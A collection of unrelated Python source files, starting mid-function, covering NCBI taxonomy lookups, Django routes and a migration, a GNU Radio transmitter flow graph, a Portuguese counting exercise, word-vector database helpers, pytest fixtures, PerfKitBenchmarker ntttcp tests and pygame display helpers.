log.warning("\nWARNING: Unknown error occurred while trying to find a valid Taxon "
f"ID for organism '{taxon.name}'")
taxon.missing_taxon_id = True
elif db == "genome":
try:
genome_id = parsed["IdList"][-1]
taxon.genome_id = int(genome_id)
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (IndexError):
log.warning(f"\nWARNING: Couldn't find a Genome ID for oragnism '{taxon.name}'. It probably "
"doesn't have one available on NCBI")
except (NameError):
log.warning(f"\nWARNING: No Genome ID found for organism '{taxon.taxon_id}'. TaIGa probably "
"didn't find the organism name for this Taxon ID")
except (Exception):
log.warning("\nWARNING: An unknown error occurred while searching Taxonomy for the "
f"Genome ID of '{taxon.taxon_id}'")
else:
log.warning(
f"\nWARNING: Taxon {taxon.taxon_id} is missing a name. Not searching for Taxon or Genome ID")
def fetch_name_from_taxon_id(user_email: str, taxon: Taxon, retries: int) -> None:
"""Receives a Taxon object and tries to fetch a name for it from its Taxon ID
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccsessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
try:
query = Entrez.efetch(db="taxonomy", id=taxon.taxon_id, retmode="xml")
parsed = Entrez.read(query)
name = parsed[0]["ScientificName"]
taxon.name = name
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (IndexError):
log.warning(
f"\nWARNING: Couldn't find an organism name for '{taxon.taxon_id}'")
taxon.missing_name = True
except (Exception):
log.warning("\nWARNING: An unknown error occurred while searching Taxonomy for the name of "
f"organism '{taxon.taxon_id}'")
taxon.missing_name = True
|
from django.urls import path
from apps.profesores.views import add_profesores, edit_profesores, delete_profesores, lista_profesores, ProfesoresList, DetalleProfesor, DeleteProfesor
urlpatterns = [
path('profesor/crear/', add_profesores, name='add_profesores'),
path('profesor/<int:pk>/editar/', edit_profesores, name='edit_profesores'),
path('profesor/<int:pk>/eliminar/', DeleteProfesor.as_view(), name='delete_profesores'),
path('profesor/<int:pk>/detalle/', DetalleProfesor.as_view(), name='read_profesores'),
path('profesores/listar/', lista_profesores, name='lista_profesores'),
path('api/profesores/listar/', ProfesoresList.as_view()),
]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Tx Scram Rand
# Generated: Thu May 25 18:27:40 2017
##################################################
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from gnuradio import blocks
from gnuradio import digital
from gnuradio import eng_notation
from gnuradio import gr
from gnuradio import qtgui
from gnuradio import uhd
from gnuradio.eng_option import eng_option
from gnuradio.filter import firdes
from optparse import OptionParser
import kiss
import numpy
import pmt
import sip
import sys
import time
import vtgs
from gnuradio import qtgui
class tx_scram_rand(gr.top_block, Qt.QWidget):
def __init__(self, addr='127.0.0.1', alpha=0.5, bb_gain=.45, port='4000', samp_rate=500e3, samps_per_symb=4, tx_correct=0, tx_freq=2395e6, tx_gain=20, tx_offset=0, tx_period=44, update_period=2000):
gr.top_block.__init__(self, "Tx Scram Rand")
Qt.QWidget.__init__(self)
self.setWindowTitle("Tx Scram Rand")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "tx_scram_rand")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Parameters
##################################################
self.addr = addr
self.alpha = alpha
self.bb_gain = bb_gain
self.port = port
self.samp_rate = samp_rate
self.samps_per_symb = samps_per_symb
self.tx_correct = tx_correct
self.tx_freq = tx_freq
self.tx_gain = tx_gain
self.tx_offset = tx_offset
self.tx_period = tx_period
self.update_period = update_period
##################################################
# Blocks
##################################################
self.vtgs_mult_scrambler_0 = vtgs.mult_scrambler(17, 0x3FFFF)
self.uhd_usrp_sink_0 = uhd.usrp_sink(
",".join(("", "")),
uhd.stream_args(
cpu_format="fc32",
channels=range(1),
),
)
self.uhd_usrp_sink_0.set_samp_rate(samp_rate)
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(tx_freq+tx_correct, tx_offset), 0)
self.uhd_usrp_sink_0.set_gain(tx_gain, 0)
self.uhd_usrp_sink_0.set_antenna('TX/RX', 0)
self.qtgui_freq_sink_x_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0.set_update_time(0.10)
self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0.enable_grid(False)
self.qtgui_freq_sink_x_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0.enable_control_panel(False)
if not True:
self.qtgui_freq_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)
self.top_layout.addWidget(self._qtgui_freq_sink_x_0_win)
self.kiss_hdlc_framer_0 = kiss.hdlc_framer(preamble_bytes=50, postamble_bytes=7)
self.digital_map_bb_0 = digital.map_bb((1,0))
self.digital_gfsk_mod_0 = digital.gfsk_mod(
samples_per_symbol=samps_per_symb,
sensitivity=1.0,
bt=0.35,
verbose=False,
log=False,
)
self.blocks_stream_mux_0 = blocks.stream_mux(gr.sizeof_char*1, (768,5232))
self.blocks_random_pdu_0 = blocks.random_pdu(256, 256, chr(0xFF), 2)
self.blocks_pdu_to_tagged_stream_0_0 = blocks.pdu_to_tagged_stream(blocks.byte_t, 'packet_len')
self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(8)
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vcc((bb_gain, ))
self.blocks_message_strobe_0_0 = blocks.message_strobe(pmt.intern("TEST"), tx_period)
self.blocks_message_strobe_0 = blocks.message_strobe(pmt.intern("TEST"), update_period)
self.analog_random_source_x_0 = blocks.vector_source_b(map(int, numpy.random.randint(0, 1, 768)), True)
##################################################
# Connections
##################################################
self.msg_connect((self.blocks_message_strobe_0, 'strobe'), (self.blocks_random_pdu_0, 'generate'))
self.msg_connect((self.blocks_message_strobe_0_0, 'strobe'), (self.kiss_hdlc_framer_0, 'in'))
self.msg_connect((self.blocks_random_pdu_0, 'pdus'), (self.blocks_message_strobe_0_0, 'set_msg'))
self.msg_connect((self.kiss_hdlc_framer_0, 'out'), (self.blocks_pdu_to_tagged_stream_0_0, 'pdus'))
self.connect((self.analog_random_source_x_0, 0), (self.blocks_stream_mux_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.qtgui_freq_sink_x_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.uhd_usrp_sink_0, 0))
self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.digital_gfsk_mod_0, 0))
self.connect((self.blocks_pdu_to_tagged_stream_0_0, 0), (self.blocks_stream_mux_0, 1))
self.connect((self.blocks_stream_mux_0, 0), (self.digital_map_bb_0, 0))
self.connect((self.digital_gfsk_mod_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self.digital_map_bb_0, 0), (self.vtgs_mult_scrambler_0, 0))
self.connect((self.vtgs_mult_scrambler_0, 0), (self.blocks_pack_k_bits_bb_0, 0))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "tx_scram_rand")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_addr(self):
return self.addr
def set_addr(self, addr):
self.addr = addr
def get_alpha(self):
return self.alpha
def set_alpha(self, alpha):
self.alpha = alpha
def get_bb_gain(self):
return self.bb_gain
def set_bb_gain(self, bb_gain):
self.bb_gain = bb_gain
self.blocks_multiply_const_vxx_0.set_k((self.bb_gain, ))
def get_port(self):
return self.port
def set_port(self, port):
self.port = port
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.uhd_usrp_sink_0.set_samp_rate(self.samp_rate)
self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)
def get_samps_per_symb(self):
return self.samps_per_symb
def set_samps_per_symb(self, samps_per_symb):
self.samps_per_symb = samps_per_symb
def get_tx_correct(self):
return self.tx_correct
def set_tx_correct(self, tx_correct):
self.tx_correct = tx_correct
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_freq(self):
return self.tx_freq
def set_tx_freq(self, tx_freq):
self.tx_freq = tx_freq
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_gain(self):
return self.tx_gain
def set_tx_gain(self, tx_gain):
self.tx_gain = tx_gain
self.uhd_usrp_sink_0.set_gain(self.tx_gain, 0)
def get_tx_offset(self):
return self.tx_offset
def set_tx_offset(self, tx_offset):
self.tx_offset = tx_offset
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_period(self):
return self.tx_period
def set_tx_period(self, tx_period):
self.tx_period = tx_period
self.blocks_message_strobe_0_0.set_period(self.tx_period)
def get_update_period(self):
return self.update_period
def set_update_period(self, update_period):
self.update_period = update_period
self.blocks_message_strobe_0.set_period(self.update_period)
def argument_parser():
parser = OptionParser(usage="%prog: [options]", option_class=eng_option)
parser.add_option(
"", "--addr", dest="addr", type="string", default='127.0.0.1',
help="Set addr [default=%default]")
parser.add_option(
"", "--alpha", dest="alpha", type="eng_float", default=eng_notation.num_to_str(0.5),
help="Set alpha [default=%default]")
parser.add_option(
"", "--bb-gain", dest="bb_gain", type="eng_float", default=eng_notation.num_to_str(.45),
help="Set bb_gain [default=%default]")
parser.add_option(
"", "--port", dest="port", type="string", default='4000',
help="Set port [default=%default]")
parser.add_option(
"", "--samp-rate", dest="samp_rate", type="eng_float", default=eng_notation.num_to_str(500e3),
help="Set samp_rate [default=%default]")
parser.add_option(
"", "--samps-per-symb", dest="samps_per_symb", type="eng_float", default=eng_notation.num_to_str(4),
help="Set samps_per_symb [default=%default]")
parser.add_option(
"", "--tx-correct", dest="tx_correct", type="eng_float", default=eng_notation.num_to_str(0),
help="Set tx_correct [default=%default]")
parser.add_option(
"", "--tx-freq", dest="tx_freq", type="eng_float", default=eng_notation.num_to_str(2395e6),
help="Set tx_freq [default=%default]")
parser.add_option(
"", "--tx-gain", dest="tx_gain", type="eng_float", default=eng_notation.num_to_str(20),
help="Set tx_gain [default=%default]")
parser.add_option(
"", "--tx-offset", dest="tx_offset", type="eng_float", default=eng_notation.num_to_str(0),
help="Set tx_offset [default=%default]")
parser.add_option(
"", "--tx-period", dest="tx_period", type="eng_float", default=eng_notation.num_to_str(44),
help="Set tx_period [default=%default]")
parser.add_option(
"", "--update-period", dest="update_period", type="eng_float", default=eng_notation.num_to_str(2000),
help="Set update_period [default=%default]")
return parser
def main(top_block_cls=tx_scram_rand, options=None):
if options is None:
options, _ = argument_parser().parse_args()
from distutils.version import StrictVersion
if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
style = gr.prefs().get_string('qtgui', 'style', 'raster')
Qt.QApplication.setGraphicsSystem(style)
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls(addr=options.addr, alpha=options.alpha, bb_gain=options.bb_gain, port=options.port, samp_rate=options.samp_rate, samps_per_symb=options.samps_per_symb, tx_correct=options.tx_correct, tx_freq=options.tx_freq, tx_gain=options.tx_gain, tx_offset=options.tx_offset, tx_period=options.tx_period, update_period=options.update_period)
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
qapp.exec_()
if __name__ == '__main__':
main()
|
nihaoya
heihie
num =10000000
mun = 200
mun = 500
|
# Generated by Django 3.2.4 on 2021-06-28 10:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('spaces', '0003_auto_20210628_1133'),
]
operations = [
migrations.AlterField(
model_name='spaces',
name='available',
field=models.BooleanField(default='Yes', null=True),
),
]
|
from time import sleep
def contador(inicio, fim, passo):
print('-=' * 25)
if passo == 0:
passo = 1
passo = abs(passo)
print(f'Contagem de {inicio} até {fim} de {abs(passo)} em {abs(passo)}:')
if inicio < fim:
for i in range(inicio, fim + 1, passo):
print(i, end=' ')
sleep(0.3)
print('FIM!!!')
elif inicio > fim:
for i in range(inicio, fim - 1, -passo):
print(i, end=' ')
sleep(0.3)
print('FIM!!!')
else:
return print('Fim e início iguais, não há contagem!')
contador(1, 10, 1)
contador(10, 0, 2)
print('Agora é sua vez de personalizar a contagem!')
inicio = int(input('Início: '))
fim = int(input('Fim: '))
passo = int(input('Passo: '))
contador(inicio, fim, passo)
|
import os
import re
import json
import base64
import numpy as np
from collections import defaultdict
import db_connection as db_con
def parse_groups(group_filename, vectors_encoded=True):
f = open(group_filename)
groups = json.load(f)
for key in groups:
for group in groups[key]:
for key in group['elements']:
if group['type'] == 'categorial':
if vectors_encoded:
group['elements'][key]['vector'] = np.fromstring(base64.decodestring(
bytes(group['elements'][key]['vector'], 'ascii')), dtype='float32')
else:
group['elements'][key]['vector'] = group['elements'][key]['vector']
if 'inferred_elements' in group:
if group['type'] == 'categorial':
for key in group['inferred_elements']:
if vectors_encoded:
group['inferred_elements'][key]['vector'] = np.fromstring(base64.decodestring(
bytes(group['inferred_elements'][key]['vector'], 'ascii')), dtype='float32')
else:
group['inferred_elements'][key]['vector'] = group['inferred_elements'][key]['vector']
return groups
def get_data_columns_from_group_data(groups):
result = set()
for key in groups:
if groups[key][0]['type'] == 'categorial':
result.add(key)
return list(result)
def get_column_data_from_label(label, type):
if type == 'column':
try:
table_name, column_name = label.split('.')
return table_name, column_name
except:
print('ERROR: Can not decode %s into table name and column name' %
(label))
return
if type == 'relation':
try:
c1, c2 = label.split('~')
c1_table_name, c1_column_name = c1.split('.')
c2_table_name, c2_column_name = c2.split('.')
return c1_table_name, c1_column_name, c2_table_name, c2_column_name
except:
print('ERROR: Can not decode relation label %s ' % (label))
return
def get_label(x, y): return '%s#%s' % (x, y)
def tokenize_sql_variable(name):
return "regexp_replace(%s, '[\.#~\s\xa0,\(\)/\[\]:]+', '_', 'g')" % (name)
def tokenize(term):
if type(term) == str:
return re.sub('[\.#~\s,\(\)/\[\]:]+', '_', str(term))
else:
return ''
def get_terms(columns, con, cur):
result = dict()
for column in columns:
table_name, column_name = column.split(
'.') # TODO get this in an encoding save way
# construct sql query
sql_query = "SELECT %s FROM %s" % (column_name, table_name)
cur.execute(sql_query)
result[column] = [tokenize(x[0]) for x in cur.fetchall()]
result[column] = list(set(result[column])) # remove duplicates
return result
def construct_index_lookup(list_obj):
result = dict()
for i in range(len(list_obj)):
result[list_obj[i]] = i
return result
def get_dist_params(vectors):
# returns the distribution parameter for vector elments
m_value = 0
count = 0
values = []
for key in vectors:
max_inst = 0
for term in vectors[key]:
m_value += np.mean(vectors[key][term])
values.extend([x for x in vectors[key][term]])
max_inst += 1
count += 1
if max_inst > 100:
break
m_value /= count
s_value = np.mean((np.array(values) - m_value)**2)
return m_value, s_value
def execute_threads_from_pool(thread_pool, verbose=False):
while(len(thread_pool) > 0):
try:
next = thread_pool.pop()
if verbose:
print('Number of threads:', len(thread_pool))
next.start()
next.join()
except:
print("Warning: threadpool.pop() failed")
return
def get_vectors_for_present_terms_from_group_file(data_columns, groups_info):
result_present = dict()
dim = 0
for column in data_columns:
group = groups_info[column][0]['elements']
group_extended = groups_info[column][0]['inferred_elements']
result_present[column] = dict()
for term in group:
result_present[column][term] = np.array(
group[term]['vector'], dtype='float32')
dim = len(result_present[column][term])
for term in group_extended:
result_present[column][term] = np.array(
group_extended[term]['vector'], dtype='float32')
dim = len(result_present[column][term])
return result_present, dim
def get_terms_from_vector_set(vec_table_name, con, cur):
QUERY_TMPL = "SELECT word, vector, id FROM %s WHERE id >= %d AND id < %d"
BATCH_SIZE = 500000
term_dict = dict()
min_id = 0
max_id = BATCH_SIZE
while True:
query = QUERY_TMPL % (vec_table_name, min_id, max_id)
cur.execute(query)
term_list = [x for x in cur.fetchall()]
if len(term_list) < 1:
break
for (term, vector, freq) in term_list:
splits = term.split('_')
current = [term_dict, None, -1]
i = 1
while i <= len(splits):
subterm = '_'.join(splits[:i])
if subterm in current[0]:
current = current[0][subterm]
else:
current[0][subterm] = [dict(), None, -1]
current = current[0][subterm]
i += 1
current[1] = vector
current[2] = freq
min_id = max_id
max_id += BATCH_SIZE
return term_dict
|
"""Test configuration."""
import asyncio
import functools
import pathlib
from typing import Any
from typing import AsyncGenerator
from typing import Generator
import pytest
import pytz
from _pytest.monkeypatch import MonkeyPatch
from aiohttp.client import ClientSession
from aioresponses import aioresponses
from click.testing import CliRunner
@pytest.fixture
async def websession() -> AsyncGenerator[ClientSession, None]:
"""Fixture for generating ClientSession."""
async with ClientSession() as aiohttp_session:
yield aiohttp_session
closed_event = create_aiohttp_closed_event(aiohttp_session)
await aiohttp_session.close()
await closed_event.wait()
@pytest.fixture(autouse=True)
def mocked_responses() -> aioresponses:
"""Fixture for mocking aiohttp responses."""
with aioresponses() as m:
yield m
@pytest.fixture
def cli_runner(
monkeypatch: MonkeyPatch, tmpdir: pathlib.Path
) -> Generator[CliRunner, None, None]:
"""Fixture for invoking command-line interfaces."""
runner = CliRunner()
monkeypatch.setattr("os.path.expanduser", lambda x: x.replace("~", str(tmpdir)))
def get_test_zone() -> Any:
# Get a non UTC zone. Let's use Paris.
return pytz.timezone("Europe/Paris")
monkeypatch.setattr("tzlocal.get_localzone", get_test_zone)
yield runner
def create_aiohttp_closed_event(
session: ClientSession,
) -> asyncio.Event: # pragma: no cover
"""Work around aiohttp issue that doesn't properly close transports on exit.
See https://github.com/aio-libs/aiohttp/issues/1925#issuecomment-639080209
Args:
session (ClientSession): session for which to generate the event.
Returns:
An event that will be set once all transports have been properly closed.
"""
transports = 0
all_is_lost = asyncio.Event()
def connection_lost(exc, orig_lost): # type: ignore
nonlocal transports
try:
orig_lost(exc)
finally:
transports -= 1
if transports == 0:
all_is_lost.set()
def eof_received(orig_eof_received): # type: ignore
try:
orig_eof_received()
except AttributeError:
# It may happen that eof_received() is called after
# _app_protocol and _transport are set to None.
pass
for conn in session.connector._conns.values(): # type: ignore
for handler, _ in conn:
proto = getattr(handler.transport, "_ssl_protocol", None)
if proto is None:
continue
transports += 1
orig_lost = proto.connection_lost
orig_eof_received = proto.eof_received
proto.connection_lost = functools.partial(
connection_lost, orig_lost=orig_lost
)
proto.eof_received = functools.partial(
eof_received, orig_eof_received=orig_eof_received
)
if transports == 0:
all_is_lost.set()
return all_is_lost
|
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for ntttcp_benchmark."""
import os
import unittest
from absl import flags
import parameterized
from perfkitbenchmarker import sample
from perfkitbenchmarker import test_util
from perfkitbenchmarker.windows_packages import ntttcp
FLAGS = flags.FLAGS
FLAGS.mark_as_parsed()
NtttcpConf = ntttcp.NtttcpConf
class NtttcpBenchmarkTestCase(unittest.TestCase, test_util.SamplesTestMixin):
def getDataContents(self, file_name):
path = os.path.join(os.path.dirname(__file__), '..', 'data', file_name)
with open(path) as fp:
contents = fp.read()
return contents
def setUp(self):
super(NtttcpBenchmarkTestCase, self).setUp()
self.xml_tcp_send_results = self.getDataContents('ntttcp_tcp_sender.xml')
self.xml_tcp_rec_results = self.getDataContents('ntttcp_tcp_receiver.xml')
self.xml_udp_send_results = self.getDataContents('ntttcp_udp_sender.xml')
self.xml_udp_rec_results = self.getDataContents('ntttcp_udp_receiver.xml')
def testNtttcpTcpParsing(self):
samples = ntttcp.ParseNtttcpResults(self.xml_tcp_send_results,
self.xml_tcp_rec_results, {})
expected_metadata = {
'async': 'False',
'bind_sender': 'False',
'cooldown_time': '30000',
'dash_n_timeout': '10800000',
'max_active_threads': '2',
'no_sync': 'False',
'port': '5003',
'receiver avg_bytes_per_compl': '149.998',
'receiver avg_frame_size': '1266.217',
'receiver avg_packets_per_dpc': '0.598',
'receiver avg_packets_per_interrupt': '0.379',
'receiver bufferCount': '9223372036854775807',
'receiver bufferLen': '150',
'receiver cpu': '36.872',
'receiver cycles': '89.055',
'receiver dpcs': '48156.278',
'receiver errors': '1',
'receiver interrupts': '75870.499',
'receiver io': '2',
'receiver packets_received': '1726938',
'receiver packets_retransmitted': '4',
'receiver packets_sent': '1092640',
'receiver realtime': '60.015000',
'receiver rb': -1,
'receiver sb': -1,
'receiver threads_avg_bytes_per_compl': '149.998',
'receiver throughput': '291.484',
'receiver total_buffers': '14577858.000',
'receiver total_bytes': '2085.379314',
'recv_socket_buff': '-1',
'run_time': '60000',
'sender avg_bytes_per_compl': '150.000',
'sender avg_frame_size': '751.222',
'sender avg_packets_per_dpc': '1.064',
'sender avg_packets_per_interrupt': '0.516',
'sender bufferCount': '9223372036854775807',
'sender bufferLen': '150',
'sender cpu': '36.234',
'sender cycles': '87.514',
'sender dpcs': '17108.590',
'sender errors': '0',
'sender interrupts': '35302.624',
'sender io': '2',
'sender_name': None,
'sender packets_received': '1092639',
'sender packets_retransmitted': '10',
'sender packets_sent': '2910833',
'sender realtime': '60.015000',
'sender rb': -1,
'sender sb': -1,
'sender threads_avg_bytes_per_compl': '150.000',
'sender total_buffers': '14577884.000',
'sender total_bytes': '2085.383034',
'send_socket_buff': '8192',
'sync_port': 'False',
'udp': 'False',
'use_ipv6': 'False',
'verbose': 'False',
'verify_data': 'False',
'wait_all': 'False',
'wait_timeout_milliseconds': '600000',
'warmup_time': '30000',
'wsa': 'False',
}
expected_thread_0_metadata = expected_metadata.copy()
expected_thread_0_metadata['thread_index'] = '0'
expected_thread_1_metadata = expected_metadata.copy()
expected_thread_1_metadata['thread_index'] = '1'
expected_samples = [
sample.Sample('Total Throughput', 291.485, 'Mbps', expected_metadata),
sample.Sample('Thread Throughput', 147.105, 'Mbps',
expected_thread_0_metadata),
sample.Sample('Thread Throughput', 144.379, 'Mbps',
expected_thread_1_metadata)
]
self.assertSampleListsEqualUpToTimestamp(expected_samples, samples)
def testNtttcpUdpParsing(self):
samples = ntttcp.ParseNtttcpResults(self.xml_udp_send_results,
self.xml_udp_rec_results, {})
expected_metadata = {
'async': 'False',
'bind_sender': 'False',
'cooldown_time': '30000',
'dash_n_timeout': '10800000',
'max_active_threads': '2',
'no_sync': 'False',
'port': '5003',
'receiver avg_bytes_per_compl': '128.000',
'receiver avg_frame_size': '99.200',
'receiver avg_packets_per_dpc': '6.147',
'receiver avg_packets_per_interrupt': '3.838',
'receiver bufferCount': '9223372036854775807',
'receiver bufferLen': '128',
'receiver cpu': '51.120',
'receiver cycles': '189.967',
'receiver dpcs': '38835.774',
'receiver errors': '0',
'receiver interrupts': '62200.183',
'receiver io': '2',
'receiver packets_received': '14326674',
'receiver packets_retransmitted': '0',
'receiver packets_sent': '0',
'receiver realtime': '60.015000',
'receiver rb': -1,
'receiver sb': -1,
'receiver threads_avg_bytes_per_compl': '128.000',
'receiver throughput': '189.447',
'receiver total_buffers': '11103157.000',
'receiver total_bytes': '1355.365845',
'recv_socket_buff': '-1',
'run_time': '60000',
'sender avg_bytes_per_compl': '128.000',
'sender avg_frame_size': '128.000',
'sender avg_packets_per_dpc': '0.000',
'sender avg_packets_per_interrupt': '0.000',
'sender bufferCount': '9223372036854775807',
'sender bufferLen': '128',
'sender cpu': '68.290',
'sender cycles': '196.108',
'sender dpcs': '250.737',
'sender errors': '0',
'sender interrupts': '1669.516',
'sender io': '2',
'sender_name': None,
'sender packets_received': '0',
'sender packets_retransmitted': '0',
'sender packets_sent': '14368008',
'sender realtime': '60.015000',
'sender rb': -1,
'sender sb': -1,
'sender threads_avg_bytes_per_compl': '128.000',
'sender total_buffers': '14368009.000',
'sender total_bytes': '1753.907349',
'send_socket_buff': '8192',
'sync_port': 'False',
'udp': 'True',
'use_ipv6': 'False',
'verbose': 'False',
'verify_data': 'False',
'wait_all': 'False',
'wait_timeout_milliseconds': '600000',
'warmup_time': '30000',
'wsa': 'False',
}
expected_thread_0_metadata = expected_metadata.copy()
expected_thread_0_metadata['thread_index'] = '0'
expected_thread_1_metadata = expected_metadata.copy()
expected_thread_1_metadata['thread_index'] = '1'
expected_samples = [
sample.Sample('Total Throughput', 245.153, 'Mbps', expected_metadata),
sample.Sample('Thread Throughput', 121.160, 'Mbps',
expected_thread_0_metadata),
sample.Sample('Thread Throughput', 123.993, 'Mbps',
expected_thread_1_metadata)
]
self.assertSampleListsEqualUpToTimestamp(expected_samples, samples)
def testSingleConfigParse(self):
ntttcp.FLAGS.ntttcp_config_list = ['True:7:800:INTERNAL:1']
expected_list = [
NtttcpConf(
udp=True, threads=7, time_s=800, ip_type='INTERNAL', packet_size=1)
]
conf_list = ntttcp.ParseConfigList()
self.assertListEqual(conf_list, expected_list)
def testEmptyConfig(self):
ntttcp.FLAGS.ntttcp_config_list = []
expected_list = [
NtttcpConf(
udp=FLAGS.ntttcp_udp,
threads=FLAGS.ntttcp_threads,
time_s=FLAGS.ntttcp_time,
ip_type=FLAGS.ip_addresses,
packet_size=FLAGS.ntttcp_packet_size)
]
conf_list = ntttcp.ParseConfigList()
self.assertListEqual(conf_list, expected_list)
def testMultiConfigParse(self):
ntttcp.FLAGS.ntttcp_config_list = [
'True:7:800:INTERNAL:1', 'False:1:2:EXTERNAL:2',
'True:44:1001:INTERNAL:3'
]
expected_list = [
NtttcpConf(
udp=True, threads=7, time_s=800, ip_type='INTERNAL', packet_size=1),
NtttcpConf(
udp=False, threads=1, time_s=2, ip_type='EXTERNAL', packet_size=2),
NtttcpConf(
udp=True,
threads=44,
time_s=1001,
ip_type='INTERNAL',
packet_size=3),
]
conf_list = ntttcp.ParseConfigList()
self.assertListEqual(conf_list, expected_list)
@parameterized.parameterized.expand(
[('MissingVal', ['True:7:800:INTERNAL:1', 'False::2:EXTERNAL:2']),
('Misspell', ['rue:7:800:INTERNAL:3', 'True:44:1001:EXTERNAL:4']),
('WrongOrder', ['True:7:INTERNAL:800:1', '44:True:1001:EXTERNAL:6'])])
def testMalformedConfig(self, name, conf):
with self.assertRaises(flags.IllegalFlagValueError):
ntttcp.FLAGS.ntttcp_config_list = conf
if __name__ == '__main__':
unittest.main()
|
# Some pygame helper functions for simple image display
# and sound effect playback
# Rob Miles July 2017
# Version 1.0
import pygame
surface = None
def setup(width=800, height=600, title=''):
'''
Sets up the pygame environment
'''
global window_size
global back_color
global text_color
global image
global surface
# Don't initialise if we already have
if surface is not None:
return
window_size = (width, height)
back_color = (255, 255, 255)
text_color = (255, 0, 0)
image = None
# pre initialise pyGame's audio engine to avoid sound latency issues
pygame.mixer.pre_init(frequency=44100)
pygame.init()
# initialise pyGame's audio engine
pygame.mixer.init()
# Create the game surface
surface = pygame.display.set_mode(window_size)
clear_display()
pygame.display.set_caption(title)
def handle_events():
'''
Consume events that are generated by the pygame window
These are not presntly used for anything
'''
setup()
for event in pygame.event.get():
pass
def play_sound(filepath):
'''
Plays the specified sound file
'''
pygame.mixer.init()
sound = pygame.mixer.Sound(filepath)
sound.play()
def display_image(filepath):
'''
Displays the image from the given filepath
Starts pygame if required
May throw exceptions
'''
global surface
global window_size
global image
handle_events()
image = pygame.image.load(filepath)
image = pygame.transform.smoothscale(image, window_size)
surface.blit(image, (0, 0))
pygame.display.flip()
def clear_display():
'''
Clears the display to the background colour
and the image (if any) on top of it
'''
global surface
global image
global back_color
handle_events()
surface.fill(back_color)
